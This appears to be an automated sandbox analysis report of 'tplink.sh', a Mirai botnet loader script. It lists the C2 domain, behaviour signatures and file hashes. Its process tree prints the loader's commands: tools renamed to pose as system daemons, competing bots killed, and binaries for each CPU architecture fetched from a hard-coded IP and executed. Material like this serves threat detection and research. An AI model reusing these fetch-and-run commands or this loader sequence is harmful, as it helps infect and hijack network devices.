Overview

overview

10

Static

static

1

tplink.sh

ubuntu-18.04-amd64

10

tplink.sh

debian-9-armhf

10

tplink.sh

debian-9-mips

10

tplink.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    21/08/2024, 17:47

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    tplink.sh

  • Size

    827B

  • MD5

    503a6790064c0d8afb7220d7ff4d559d

  • SHA1

    c00a805062e7a6274dde96063d42065ba2286085

  • SHA256

    f495ac84e4181503f0e6e4e21728a0cb82c7e9a3f6e1e54741f6eaf589aea82e

  • SHA512

    6c7ab7e8cf0b5b07b1c9cae94e4631e3fab493366d80d9946ba75a11897d8dfe658dcd96fd26d04c3b85a87786aa0656293e331a2b436b018547634c0dd45e37

Score
10/10
miraibotnetevasion

Malware Config

Extracted

Family

mirai

C2

really.idoingitagain.space

Extracted

Family

mirai

C2

really.idoingitagain.space

Extracted

Family

mirai

C2

really.idoingitagain.space

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Deletes Audit logs 1 TTPs 1 IoCs

    Deletes logs related to the Linux Audit framework.

    evasion
  • Deletes system logs 1 TTPs 1 IoCs

    Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

    evasion
  • Executes dropped EXE 23 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Deletes log files 1 TTPs 1 IoCs

    Deletes log files on the system.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 1 IoCs
  • Reads CPU attributes 1 TTPs 18 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/tplink.sh
    /tmp/tplink.sh
    1⤵
      PID:703
      • /bin/cp
        cp -p /usr/bin/pkill httpd
        2⤵
        • Writes file to tmp directory
        PID:706
      • /bin/cp
        cp -p /usr/bin/wget sshd
        2⤵
        • Writes file to tmp directory
        PID:713
      • /bin/cp
        cp -p /usr/bin/curl telnetd
        2⤵
        • Writes file to tmp directory
        PID:716
      • /bin/chmod
        chmod +x httpd
        2⤵
          PID:718
        • /bin/chmod
          chmod 777 httpd
          2⤵
            PID:720
          • /bin/chmod
            chmod +x sshd
            2⤵
              PID:722
            • /bin/chmod
              chmod 777 sshd
              2⤵
                PID:724
              • /bin/chmod
                chmod +x telnetd
                2⤵
                  PID:726
                • /bin/chmod
                  chmod 777 telnetd
                  2⤵
                    PID:728
                  • /usr/bin/pkill
                    pkill -f bot.x86
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:731
                  • /tmp/httpd
                    ./httpd -f bot.x86
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:734
                  • /usr/bin/pkill
                    pkill -f bot.arm4
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:735
                  • /tmp/httpd
                    ./httpd -f bot.arm4
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:737
                  • /usr/bin/pkill
                    pkill -f bot.arm5
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:739
                  • /tmp/httpd
                    ./httpd -f bot.arm5
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:741
                  • /usr/bin/pkill
                    pkill -f bot.arm6
                    2⤵
                    • Reads CPU attributes
                    PID:744
                  • /tmp/httpd
                    ./httpd -f bot.arm6
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:746
                  • /usr/bin/pkill
                    pkill -f bot.arm7
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:747
                  • /tmp/httpd
                    ./httpd -f bot.arm7
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:748
                  • /usr/bin/pkill
                    pkill -f x86
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:749
                  • /tmp/httpd
                    ./httpd -f x86
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:751
                  • /usr/bin/pkill
                    pkill -f arm5
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:752
                  • /tmp/httpd
                    ./httpd -f arm5
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:753
                  • /usr/bin/pkill
                    pkill -f arm6
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:754
                  • /tmp/httpd
                    ./httpd -f arm6
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:755
                  • /usr/bin/pkill
                    pkill -f arm7
                    2⤵
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:756
                  • /tmp/httpd
                    ./httpd -f arm7
                    2⤵
                    • Executes dropped EXE
                    • Reads CPU attributes
                    • Reads runtime system information
                    PID:757
                  • /tmp/sshd
                    ./sshd http://45.66.231.129/xd_/cyber-x86
                    2⤵
                    • Executes dropped EXE
                    • Writes file to tmp directory
                    PID:758
                  • /bin/chmod
                    chmod 777 cyber-x86
                    2⤵
                      PID:759
                    • /bin/chmod
                      chmod +x cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                      2⤵
                        PID:760
                      • /tmp/cyber-x86
                        ./cyber-x86 tplink-x86
                        2⤵
                        • Executes dropped EXE
                        PID:761
                      • /tmp/sshd
                        ./sshd http://45.66.231.129/xd_/cyber-sh4
                        2⤵
                        • Executes dropped EXE
                        • Writes file to tmp directory
                        PID:763
                      • /bin/chmod
                        chmod 777 cyber-sh4
                        2⤵
                          PID:764
                        • /bin/chmod
                          chmod +x cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                          2⤵
                            PID:765
                          • /tmp/cyber-sh4
                            ./cyber-sh4 tplink-sh4
                            2⤵
                            • Executes dropped EXE
                            PID:766
                          • /tmp/sshd
                            ./sshd http://45.66.231.129/xd_/cyber-ppc
                            2⤵
                            • Executes dropped EXE
                            • Writes file to tmp directory
                            PID:768
                          • /bin/chmod
                            chmod 777 cyber-ppc
                            2⤵
                              PID:769
                            • /bin/chmod
                              chmod +x cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                              2⤵
                                PID:770
                              • /tmp/cyber-ppc
                                ./cyber-ppc tplink-ppc
                                2⤵
                                • Executes dropped EXE
                                PID:771
                              • /tmp/sshd
                                ./sshd http://45.66.231.129/xd_/cyber-mpsl
                                2⤵
                                • Executes dropped EXE
                                • Writes file to tmp directory
                                PID:773
                              • /bin/chmod
                                chmod 777 cyber-mpsl
                                2⤵
                                  PID:774
                                • /bin/chmod
                                  chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                  2⤵
                                    PID:775
                                  • /tmp/cyber-mpsl
                                    ./cyber-mpsl tplink-mpsl
                                    2⤵
                                    • Deletes Audit logs
                                    • Deletes system logs
                                    • Executes dropped EXE
                                    • Modifies Watchdog functionality
                                    • Deletes log files
                                    • Changes its process name
                                    PID:776
                                  • /tmp/sshd
                                    ./sshd http://45.66.231.129/xd_/cyber-mips
                                    2⤵
                                    • Executes dropped EXE
                                    • Writes file to tmp directory
                                    PID:778
                                  • /bin/chmod
                                    chmod 777 cyber-mips
                                    2⤵
                                      PID:780
                                    • /bin/chmod
                                      chmod +x cyber-mips
                                      2⤵
                                        PID:781
                                      • /bin/chmod
                                        chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                        2⤵
                                          PID:783
                                        • /tmp/cyber-mips
                                          ./cyber-mips tplink-mips
                                          2⤵
                                            PID:784
                                          • /tmp/sshd
                                            ./sshd http://45.66.231.129/xd_/cyber-m68k
                                            2⤵
                                            • Executes dropped EXE
                                            • Writes file to tmp directory
                                            PID:786
                                          • /bin/chmod
                                            chmod 777 cyber-m68k
                                            2⤵
                                              PID:791
                                            • /bin/chmod
                                              chmod +x cyber-m68k
                                              2⤵
                                                PID:793
                                              • /bin/chmod
                                                chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                2⤵
                                                  PID:795
                                                • /tmp/cyber-m68k
                                                  ./cyber-m68k tplink-m68k
                                                  2⤵
                                                    PID:796
                                                  • /tmp/sshd
                                                    ./sshd http://45.66.231.129/xd_/cyber-arm7
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Writes file to tmp directory
                                                    PID:798
                                                  • /bin/chmod
                                                    chmod 777 cyber-arm7
                                                    2⤵
                                                      PID:806
                                                    • /bin/chmod
                                                      chmod +x cyber-arm7
                                                      2⤵
                                                        PID:808
                                                      • /bin/chmod
                                                        chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                        2⤵
                                                          PID:810
                                                        • /tmp/cyber-arm7
                                                          ./cyber-arm7 tplink-arm7
                                                          2⤵
                                                            PID:811
                                                          • /tmp/sshd
                                                            ./sshd http://45.66.231.129/xd_/cyber-arm6
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Writes file to tmp directory
                                                            PID:813
                                                          • /bin/chmod
                                                            chmod 777 cyber-arm6
                                                            2⤵
                                                              PID:827
                                                            • /bin/chmod
                                                              chmod +x cyber-arm6
                                                              2⤵
                                                                PID:829
                                                              • /bin/chmod
                                                                chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                                2⤵
                                                                  PID:831
                                                                • /tmp/cyber-arm6
                                                                  ./cyber-arm6 tplink-arm6
                                                                  2⤵
                                                                    PID:832
                                                                  • /tmp/sshd
                                                                    ./sshd http://45.66.231.129/xd_/cyber-arm5
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Writes file to tmp directory
                                                                    PID:834
                                                                  • /bin/chmod
                                                                    chmod 777 cyber-arm5
                                                                    2⤵
                                                                      PID:845
                                                                    • /bin/chmod
                                                                      chmod +x cyber-arm5
                                                                      2⤵
                                                                        PID:846
                                                                      • /bin/chmod
                                                                        chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                                        2⤵
                                                                          PID:847
                                                                        • /tmp/cyber-arm5
                                                                          ./cyber-arm5 tplink-arm5
                                                                          2⤵
                                                                            PID:848
                                                                          • /tmp/sshd
                                                                            ./sshd http://45.66.231.129/xd_/cyber-arm4
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Writes file to tmp directory
                                                                            PID:849
                                                                          • /bin/chmod
                                                                            chmod 777 cyber-arm4
                                                                            2⤵
                                                                              PID:850
                                                                            • /bin/chmod
                                                                              chmod +x cyber-arm4
                                                                              2⤵
                                                                                PID:851
                                                                              • /bin/chmod
                                                                                chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-DPaW7j telnetd tplink.sh
                                                                                2⤵
                                                                                  PID:852
                                                                                • /tmp/cyber-arm4
                                                                                  ./cyber-arm4 tplink-arm4
                                                                                  2⤵
                                                                                    PID:853

                                                                                Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • /tmp/cyber-mpsl
                                                                                        Filesize

                                                                                        97KB

                                                                                        MD5

                                                                                        605c719579681c44f640587ff4dc6db2

                                                                                        SHA1

                                                                                        b2d17a8d7dd094a6c2d87f993e130383e94e16de

                                                                                        SHA256

                                                                                        34e3196effc44c3fea00cd70a38c3d4ba747255911b6be2a2c9ef09a47168c47

                                                                                        SHA512

                                                                                        cb9ff093b9061180d9f6294e80560000fd7fd36b54521ddf5763dc10a399deeaeb0aa0461807b2034562280f8d98a44f41cb7e4368c5ac78a1d8390345840ac7

                                                                                        Download Submit

                                                                                      • /tmp/cyber-ppc
                                                                                        Filesize

                                                                                        65KB

                                                                                        MD5

                                                                                        cc543d4df9e33766e382e50ebfdad980

                                                                                        SHA1

                                                                                        8a46b3f78f375cf06b9610be58fafe89c61969b2

                                                                                        SHA256

                                                                                        40bcd636db4a86441b44b9c20ce3d759ddef4a18c168945b53df951edf0b3d42

                                                                                        SHA512

                                                                                        38ed37e68e99dbb8658dd1f3823e27baef01206b40ec5d0a6a71fd21ff173566b81666a593c8e3a1ccb8c7851bf74bdd11339410200e0508ce69d5ac39352d08

                                                                                        Download Submit

                                                                                      • /tmp/cyber-sh4
                                                                                        Filesize

                                                                                        51KB

                                                                                        MD5

                                                                                        666096845b3b27722b9d9629ddff12c1

                                                                                        SHA1

                                                                                        0bed897edd6422c3cfb24b0db44a2c87227e4e6e

                                                                                        SHA256

                                                                                        dd38e661acad7a79affb7b8b0abe2eb634bfd04c338afd5f7bd93a34aa16dd31

                                                                                        SHA512

                                                                                        229c4c1dda0224b90d6c827c2d63c6a3d90453e5358e38ffaa06c9f3f49d4cfd6e2464a86d69b9a6b06350b003d95a5d7c0312329bb1a51eb9956c12b8052789

                                                                                        Download Submit

                                                                                      • /tmp/cyber-x86
                                                                                        Filesize

                                                                                        61KB

                                                                                        MD5

                                                                                        3d574d6a4916704b337d76226d205abd

                                                                                        SHA1

                                                                                        80021cc1fc609bde17db484e58dece6a247ee11d

                                                                                        SHA256

                                                                                        df0f2131b26054328c7ae7428b6cc4d05967dfd334126a99d26660335c02eb0d

                                                                                        SHA512

                                                                                        e5a843ba13eeb9d83fd0a5b3d34cecfa449e6f9ba77cea1b8867b0fbf91c2d4bbc14f6e8cd27b5550622781b8b29ae0ac952c4ab4e7e4eb5f174a1fd2e24d5a9

                                                                                        Download Submit

                                                                                      • /tmp/httpd
                                                                                        Filesize

                                                                                        26KB

                                                                                        MD5

                                                                                        9b2e60147827c26862e347e58ea9b56b

                                                                                        SHA1

                                                                                        d02b7acc6394f740de96cab4acf1fe7734b61611

                                                                                        SHA256

                                                                                        d0a4ab23b044294d3eaa335869195250eeae676a9a434cd68ec9cc4f4c80bfe2

                                                                                        SHA512

                                                                                        5ab5932a3e9ac6695637aa4f0e68fa85b8fca74bdac3fb17a6e8b1af0d7032030741fc640e49b005bc06c2ffda74feb1fe67709f660672951b0ea54ac98381d0

                                                                                        Download Submit

                                                                                      • /tmp/sshd
                                                                                        Filesize

                                                                                        536KB

                                                                                        MD5

                                                                                        4a7c9f69532775b790e8d999f73a68b9

                                                                                        SHA1

                                                                                        9cf4d3d57284103e828dcaa514bfa76e84366472

                                                                                        SHA256

                                                                                        ba3dee31b794d6e0e2df228a87f54f3432100a4acfee8f1a7a64d2584cd80495

                                                                                        SHA512

                                                                                        925d73442f8a824ac2c016d1ce12293b30ced91cc3954ef74dbd604fc7b4a6c60227c82c52e5491ec3ba8d20a2a8d3b3b6739ef64cc242b9335a756f6631b128

                                                                                        Download Submit

                                                                                      • /tmp/telnetd
                                                                                        Filesize

                                                                                        186KB

                                                                                        MD5

                                                                                        7bca13eb125880aa2615ae9f836ac7fd

                                                                                        SHA1

                                                                                        884a53c9f84f5b57735da52e2672aa46e282567a

                                                                                        SHA256

                                                                                        e3c97425e53915f35f1e8315b39d827714c81142a8e6899b7d45cefa9a31f6af

                                                                                        SHA512

                                                                                        45dc3f8d7ef327785ded043dfe981c9d4eb1faabc1362ad634e3c7795f0f925a9c9b2842d1f8cc19bc125c0d71b42365cb2ad669d2543d2b9bcad6b3c782d1c4

                                                                                        Download Submit